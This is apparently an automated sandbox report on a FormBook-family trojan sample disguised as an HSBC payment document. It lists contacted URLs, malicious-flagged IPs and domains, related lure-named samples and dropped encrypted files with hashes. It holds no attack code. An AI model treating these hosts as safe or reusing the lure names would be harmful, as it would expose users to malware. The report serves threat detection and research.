http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/pics/28903/search.png)	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/Crochet_Flowers.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEq	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://delivery.consentmanager.net	sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.Crochetpets.online	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/__media__/js/trademark.php?d=crochetpets.online&type=ns	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/js/min.js?v2.3	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/Crochet_Baby.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkci	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/Crochet_Cotton.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqk	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/__media__/design/underconstructionnotice.php?d=crochetpets.online	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.110.124.133	hentaistgma.net	Italy	39729	REGISTER-ASIT	true
54.67.87.110	www.ngmr.xyz	United States	16509	AMAZON-02US	true
221.121.144.149	inf30027group23.xyz	Australia	45671	AS45671-NET-AUWholesaleServicesProviderAU	true
199.59.243.227	www.polarmuseum.info	United States	395082	BODIS-NJUS	true
208.91.197.27	www.crochetpets.online	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
198.44.251.203	www.n0pme6.top	United States	26484	IKGUL-26484US	true
81.2.196.19	kovallo.cloud	Czech Republic	24806	INTERNET-CZKtis238403KtisCZ	true
162.213.249.216	www.tophcom.online	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1539076
Start date and time:	2024-10-22 05:37:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rHSBCBank_Paymentswiftcpy.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@11/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 48 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EqOUZfSIzU.exe, PID 5696 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:38:56	API Interceptor	7797989x Sleep call for process: sdchange.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
195.110.124.133	Request for 30 Downpayment.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.nidedabeille.net/l6bs/
	Hesap-hareketleriniz10-15-2024.exe	Get hash	malicious	FormBook	Browse	www.bluegirls.blog/cejh/
	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	www.trisixnine.net/x0wm/
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	www.bluegirls.blog/cejh/
	RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe	Get hash	malicious	FormBook	Browse	www.trisixnine.net/x0wm/
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.hentaistgma.net/8ouq/
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nidedabeille.net/qwre/
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.hentaistgma.net/00ob/
	rAGROTIS10599242024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	BL Draft-Invoice-Packing list-Shipping Document.pif.exe	Get hash	malicious	FormBook	Browse	www.trisixnine.net/0057/
54.67.87.110	jeez.exe	Get hash	malicious	FormBook	Browse	www.ngmr.xyz/qj8y/
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.ngmr.xyz/txr6/
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.ngmr.xyz/txr6/
	AUG 2024 SOA.exe	Get hash	malicious	FormBook	Browse	www.teenageoverload.xyz/tk11/
	DN.exe	Get hash	malicious	FormBook	Browse	www.teenageoverload.xyz/tk11/
	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	www.teenageoverload.xyz/tk11/
	ZRaWv2lX6l.exe	Get hash	malicious	FormBook	Browse	www.3937981.xyz/enuj/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.donante-de-ovulos.biz	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	7v8szLCQAn.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Payment.vbs	Get hash	malicious	FormBook	Browse	199.59.243.227
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	QlHhDu2uh1.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO23100072.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO-000001488.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Amended Proforma #U2013 SMWD5043.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
www.crochetpets.online	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
www.polarmuseum.info	w64HYOhfv1.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	enkJ6J7dAn.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	payment copy.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
www.ngmr.xyz	jeez.exe	Get hash	malicious	FormBook	Browse	54.67.87.110
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	54.67.87.110
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	54.67.87.110
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	54.67.87.110
www.tophcom.online	seethebstthingstogetwithentirethingstobegret.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	162.213.249.216
www.tophcom.online	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	162.213.249.216

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	52.35.74.193
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	18.145.226.37
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	52.17.252.32
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	52.68.87.231
	na.elf	Get hash	malicious	Unknown	Browse	34.219.162.229
	bin.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	130.177.9.211
	bin.armv7l.elf	Get hash	malicious	Mirai	Browse	52.69.222.3
	https://mcprod.britwyn.co.nz	Get hash	malicious	Unknown	Browse	3.126.222.51
	http://manatoki463.net	Get hash	malicious	Unknown	Browse	3.160.150.86
	bin.x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse	52.8.76.159
REGISTER-ASIT	Request for 30 Downpayment.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	195.110.124.133
	http://evriservicescompany.com/	Get hash	malicious	Unknown	Browse	81.88.58.193
	Hesap-hareketleriniz10-15-2024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	NjjLYnPSZr.exe	Get hash	malicious	FormBook	Browse	81.88.48.71
	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
AS45671-NET-AUWholesaleServicesProviderAU	bin.x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse	178.171.73.59
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	203.132.130.8
	ppc.elf	Get hash	malicious	Mirai	Browse	117.20.6.56
	spc.elf	Get hash	malicious	Mirai	Browse	202.60.94.183
	na.elf	Get hash	malicious	Mirai	Browse	202.60.94.150
	na.elf	Get hash	malicious	Mirai, Gafgyt	Browse	202.60.94.15
	na.elf	Get hash	malicious	Mirai	Browse	202.60.94.164
	RFNnJGB7wy.elf	Get hash	malicious	Mirai	Browse	168.80.10.52
	na.elf	Get hash	malicious	Mirai	Browse	202.60.94.187
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	221.121.144.149
BODIS-NJUS	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Re property pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	#U8a02#U55ae#U63cf#U8ff0.vbs	Get hash	malicious	FormBook	Browse	199.59.243.227
	Document.html	Get hash	malicious	HTMLPhisher	Browse	199.59.243.227
	jOAcln1aPL.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	jOAcln1aPL.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	890927362736.exe	Get hash	malicious	DBatLoader, FormBook	Browse	199.59.243.227
	na.hta	Get hash	malicious	Cobalt Strike, FormBook, GuLoader	Browse	199.59.243.227
	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	http://msnnss001.vastserve.com/	Get hash	malicious	Unknown	Browse	199.59.243.205

Process:	C:\Windows\SysWOW64\sdchange.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut25C.tmp

Download File

Process:	C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
File Type:	data
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	7.993922125731863
Encrypted:	true
SSDEEP:	6144:iCgyDiit+LDyQj6oqpm0+a8MpN1kG24txcftRTz7MyXJ5HaVOk7E+y:irWl+Dysd8OaTpN1W4kH7MyXJwk
MD5:	EF0D90F7D8F6FAA12364932A07446E4A
SHA1:	06BD3ECE9F18F41C88EF3F5E0AECB7E936F64E05
SHA-256:	96B0D49BB44D540C77D8515AEE64E4BF3D1DE4CAD4C461BCDBCB23C1F16A32FF
SHA-512:	263A141DF80290B0AAFB2838EA51A607539DF55C9837C0808B50F4973C44013FC0D83731A1127A932DAF15E1B796D6677CBDE567C8E293412C8B6D825662AF4D
Malicious:	false
Reputation:	low
Preview:	x..a.4JD2...^.....Q0...l1M..2SXN5JQ384JD2E5FW2SXN5JQ384JD2.5FW<L.@5.X...K..da.>As(<Z-#RU.)%\+Z2wP6x<@$qZV...aeX)3W}UC?nQ384JD2<4O..3?..*6..T-.(.mR4.T...XS.^...z7U..'V"lS_.JD2E5FW2..N5.P28>.hE5FW2SXN.JS235AD2.1FW2SXN5JQ.)4JD"E5F76SXNuJQ#84JF2E3FW2SXN5LQ384JD2EUBW2QXN5JQ3:4..2E%FW"SXN5ZQ3(4JD2E5VW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JjF M2W2S,.1JQ#84J.6E5VW2SXN5JQ384JD2e5F72SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2

C:\Users\user\AppData\Local\Temp\renowner

Download File

Process:	C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
File Type:	data
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	7.993922125731863
Encrypted:	true
SSDEEP:	6144:iCgyDiit+LDyQj6oqpm0+a8MpN1kG24txcftRTz7MyXJ5HaVOk7E+y:irWl+Dysd8OaTpN1W4kH7MyXJwk
MD5:	EF0D90F7D8F6FAA12364932A07446E4A
SHA1:	06BD3ECE9F18F41C88EF3F5E0AECB7E936F64E05
SHA-256:	96B0D49BB44D540C77D8515AEE64E4BF3D1DE4CAD4C461BCDBCB23C1F16A32FF
SHA-512:	263A141DF80290B0AAFB2838EA51A607539DF55C9837C0808B50F4973C44013FC0D83731A1127A932DAF15E1B796D6677CBDE567C8E293412C8B6D825662AF4D
Malicious:	false
Preview:	x..a.4JD2...^.....Q0...l1M..2SXN5JQ384JD2E5FW2SXN5JQ384JD2.5FW<L.@5.X...K..da.>As(<Z-#RU.)%\+Z2wP6x<@$qZV...aeX)3W}UC?nQ384JD2<4O..3?..*6..T-.(.mR4.T...XS.^...z7U..'V"lS_.JD2E5FW2..N5.P28>.hE5FW2SXN.JS235AD2.1FW2SXN5JQ.)4JD"E5F76SXNuJQ#84JF2E3FW2SXN5LQ384JD2EUBW2QXN5JQ3:4..2E%FW"SXN5ZQ3(4JD2E5VW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JjF 